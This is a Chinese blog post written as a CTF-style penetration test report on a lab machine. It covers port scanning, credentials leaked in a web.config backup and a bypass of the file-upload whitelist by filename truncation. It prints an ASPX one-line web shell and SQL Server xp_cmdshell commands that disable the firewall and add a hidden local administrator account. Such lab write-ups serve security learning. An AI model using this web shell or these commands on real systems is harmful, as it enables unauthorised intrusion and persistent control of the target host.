渗透测试报告

最新推荐文章于 2024-07-31 19:38:21 发布
最新推荐文章于 2024-07-31 19:38:21 发布
阅读量3k 收藏 28
点赞数 10
分类专栏: 网络安全 文章标签: 数据库 sql sqlserver
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51061782/article/details/127690807
版权

渗透测试报告
PTES:
以CTF比赛的形式体验PTES流程。CTF:夺旗赛。找flag。
1、前期交互:授权委托书 ,说明渗透的目标IP和端口等信息。
2003密码:admin123

此次渗透测试的目标:
获取到目标机IP地址:192.168.233.129 (我的主机号)
在这里插入图片描述

2、信息搜集
通过信息搜集工具,搜集目标靶机的信息,扫描出1433(sql server) 、27689端口。登录到27689端口,可以发现是一个文件上传系统。接下来寻找登录该系统的方法。由于前面发现了1433端口打开,可以判断出这个系统使用了SQL server 服务,用户的注册登录很可能是存放在sql数据库中的。查看页面源代码后发现后端使用了aspx来写,一句话木马选用对应的语句。
在这里插入图片描述

目录扫描
在这里插入图片描述

图 1-2
在这里插入图片描述

图1-3
在这里插入图片描述

图1-4
在这里插入图片描述

图1-5
在这里插入图片描述

图1-6
通过目录扫描,扫描出敏感目录:web.config.bak,发现了后端数据库的用户名和密码。
在这里插入图片描述

图1-7

通过数据库客户端工具navicat,登陆数据库库,查看表UserList,发现web应用的用户名和密码。(admin asdadwn_d2112)
在这里插入图片描述

找到了第一个flag:4k3s9m3d。

3、威胁建模
发现应用有上传功能,利用上传功能展开攻击。

4、漏洞分析
利用文件上传,上传一句话木马getshell等实现攻击。

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/90815ec12de143f5bdfbbac060144364.png)

5、渗透测试
在这里插入图片描述

当我写好一句话木马的PHP文件上传的时候它提醒我不能上传这类文件,这让我非常头疼。
在这里插入图片描述

查看页面源码之后,我发现再前端的界面并没有提及对于文件格式的验证,查阅资料后发现对文件格式的验证有本地限制和服务器防御两种,服务器防御的可能性比较大,后面我尝试了一下关闭JS语言,发现点击上传之后就没有反应了,可见的确是服务器防御。
在这里插入图片描述

接下来开始想办法绕过服务器防御。

这里采用抓包技巧获得传出的数据包,修改此处的数据类型可能可以绕过服务器防御。我传了一张图片来看它到底会接受哪一种类型的数据。

在尝试后发现修改后缀名会直接影响文件能否上传,我改了一些奇奇怪怪的后缀,发现都不能上传,可以预测这应该是一个白名单检验。在多次修改数据包文件后还是未能实现攻击。在与同学讨论后发现文件名命名规则的缺陷,超过32位的文件名会自动截断,时间戳会自动加上19位,我们只需要将文件名命名为19+13位即可。于是将文件名改为如图所示,就可以上传成功。
之后对C盘下Administrator文件夹内容进行访问发现拒绝访问,需要权限提升
在这里插入图片描述

之后通过浏览web目录发现历史web.config
在这里插入图片描述

进一步获取sa的账号密码信息,不得不说这为我们权限提升提供了最大的助力:
在这里插入图片描述

发现出现了中文乱码,但是不影响我们获取数据库账号密码
在这里插入图片描述

之后通过执行SQL语句来查看权限,可以看到已然是system权限了,而这也是因为SQLServer默认是以system权限运行的,外加上sa权限导致我们可以直接获取到system权限:

use master;
exec master..xp_cmdshell "whoami";
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/06d25d7625864d7ba7fda42e5dcb4a45.png)

关防火墙
下面我们要做的就是关闭防火墙开RDP了,在这里为了执行系统命令我们首先开启XP_cmdshell:

use master;
exec sp_configure 'show advanced options',1;
reconfigure;

exec sp_configure 'xp_cmdshell',1;
reconfigure;
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/6df639c71d804cbeb0d41dde72e44ad9.png)

之后关闭防火墙:


```php
EXEC master.dbo.xp_cmdshell 'netsh firewall set opmode disable'
 


![在这里插入图片描述](https://img-blog.csdnimg.cn/ffe3064494334ea8b3f350f11835e2b5.png)

开启RDP
下一步自然而然就是开启RDP进行远程链接了,命令如下:
 、![在这里插入图片描述](https://img-blog.csdnimg.cn/57ba81738b6b4aadb7616507757fcf34.png)

添加用户
为了实现RDP远程链接我们还需要创建一个用户账号并将其添加到管理员组:

```c
exec master..xp_cmdshell "net user test12 123.com /add"
exec master..xp_cmdshell "net localgroup administrators test12 /add"
exec master..xp_cmdshell "net user test12"

远程连接
之后使用之前创建的账号进行远程链接操作:

在这里插入图片描述

之后我们在桌面成功获取到Key:所有任务到此结束!

爱学习的【丿小菜鸡
关注
  • 10
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试报告模板_OSCP 考试报告模板(增强版)
weixin_39697660的博客
12-17 676
官方的报告模板下载地址:https://www.offensive-security.com/pwk-online/PWKv1-REPORT.doc但我发现官方的渗透测试报告适合用在项目上,但不适合用来提交考试,因为它包含了以下内容:漏洞名称漏洞描述漏洞修复建议权限维持工具清理...因此,我在官方报告的基础上修订了一版,让它更适合用来作为 OSCP 考试报告的模板,逻辑更清晰,一共分为 5 台主机...
Savior:渗透测试报告自动生成工具
HBohan的博客
12-08 1121
主要是方便统计漏洞的发现者,后续可能大概也许会添加漏洞统计模块,根据提交数据、漏洞类型、时间等进行统计报表,当前用户管理模块仅允许通过Django后台进行修改,前端只负责展示,主要是我太懒了。
最全如何编写一份高质量的渗透测试报告?(2),2024年最新每个程序员都必须掌握的8种数据结构
2401_84141293的博客
05-11 341
然而,渗透测试的真正价值在于为用户提交一份全面和可操作的渗透测试报告,这份报告不仅仅是一个技术性文档,同时也是促进安全团队与业务部门之间有效沟通协同的工具,需要准确地将发现的问题和修复建议传达给企业的高级管理者和其他利益相关者。对企业而言,重要的是要根据漏洞的严重性和对组织的潜在影响来确定对其修复处置的优先级。在每日工作结束后,应该要求测试人员将当日的成果做成详细记录,将测试中的重点环节和数据记录在案,包括已检测的项目、使用的测试方法、测试过程描述、测试结果说明以及重点环节的截图等。
渗透测试报告生成工具
记录开发和安全学习过程中的点点滴滴
06-02 1415
下面介绍两个我常用的报告生成工具,在日常的渗透测试过程中,我们在进行合法合规的进行渗透测试后,需要进行编写相应的详细的渗透测试报告来提交给客户或是审核人员,方便审核人员对漏洞进行复现和验证,当然,很多时候我们写的报告很多都是重复性的内容,尤其是相同的漏洞类型,像我自己之前在没有合适的工具之前都是通过手工将一些重复性的内容写好,然后进行替换,当然有了工具就不一样了,可以帮助我们节省很多时间来写报告,毕竟很多时候做项目的时候报告交的快慢就是金钱的衡量.
渗透测试报告怎么写?
okcross0的博客
12-18 1050
报告书的读者有两类:一类是主管,主管有决策权,但通常没有耐心查看技术文件,报告书最好一开始就节选所发现的“重点漏洞”,这些重点漏洞要用直白的话写,让主管一目了然,翻开报告书就能够感受到渗透测试的价值;至于描述执行过程说明文字则可以详细些,尤其是专业术语的说明,用以展现测试团队技术的“高深”,不过自己没有把握解释清楚的术语就不要写进去了,免得弄巧成拙,虽然这一部分看的人不多,但是可以增加报告书的版本分量。报告书是整个测试测试操作结果的汇总,大概会以下列大纲撰写:。前言:说明执行测试的目的。
渗透测试报告模板
千寻的博客
01-14 7431
XXXX 渗透测试服务的主要流程如下: (一)信息收集 信息收集是指渗透实施前尽可能多地获取目标信息系统相关信息,例如网站 注册信息、共享资源、系统版本信息、已知漏洞及弱口令等等。通过对以上信息 的收集,发现可利用的安全漏洞,为进一步对目标信息系统进行渗透入侵提供基 础。 (二)弱点分析 对收集到的目标信息系统可能存在的可利用安全漏洞或弱点进行分析,并确 定渗透方式和步骤实施渗透测试。 (三)获取...
一份标准的渗透测试报告是什么样的?(附报告模板)
qq_35254085的博客
11-29 3712
一个完整的渗透测试工作流程中,实际有近一半时间都用在如何编写报告上,渗透测试工程师的工作,不仅需要具备高超的渗透测试水平,同样也需要把一个深奥的技术点解释的通俗易懂,即使是完全不懂安全的人也可以理解。一份标准的渗透测试报告究竟是什么样的呢?
渗透测试报告的编写
千寻的博客
12-13 2574
渗透测试报告的编写 但是对目标的攻击并不是最终的目的。 正确的做法应该是将发现的问题以报告的形式提交绐客户。 让客户能够理解问题的严重性,并对此作出正确的回应,及时进行改正,这才是我们真正应该做的。 这一切需要通过沟通才能完成,除了与客户之间的交流之外,还必须向客户提供一份易于理解的书面测试报告渗透测试的最后一个也是最为重要的一个阶段就是报告编写。 作为一个合格的渗透测试人员应该具备良好的报告编写能力。 渗透测试人员在编写测试的时候应该保证报告的专业性,但是这份报告最后的阅读者往往是并不具备孝业领知识
渗透测试报告封面样本
Gjqhs的博客
01-12 469
封面: 摘要: 正文: 素材均来源于网络,侵删
XX系统渗透测试报告IT
07-07
【XX系统渗透测试报告IT】是一份详细的网络安全评估文档,主要针对XXX下属的XX系统证书版进行了渗透测试,目的是揭示潜在的安全风险并提供改进措施。报告由XX科技的渗透测试团队独立执行,涵盖了一系列测试阶段,...
网站渗透测试报告-模板.docx
03-26
网站渗透测试报告
网站渗透测试报告模板.doc
07-09
网站渗透测试报告模板.doc
XXXX系统渗透测试报告书.pdf
01-14
根据在实践中总结的渗透测试报告书 --------免责声明:请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果上传者概不负责!
简单的 mongoDB 学习
qq_19342829的博客
07-31 518
mongodb入门学习整理
社区养老服务小程序的设计
最新发布
Karen198的博客
07-31 567
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
二进制部署k8s集群之master节点和etcd数据库集群(上)
zx52306的博客
07-30 1193
【代码】二进制部署k8s集群之master节点和etcd数据库集群(上)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爱学习的【丿小菜鸡

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值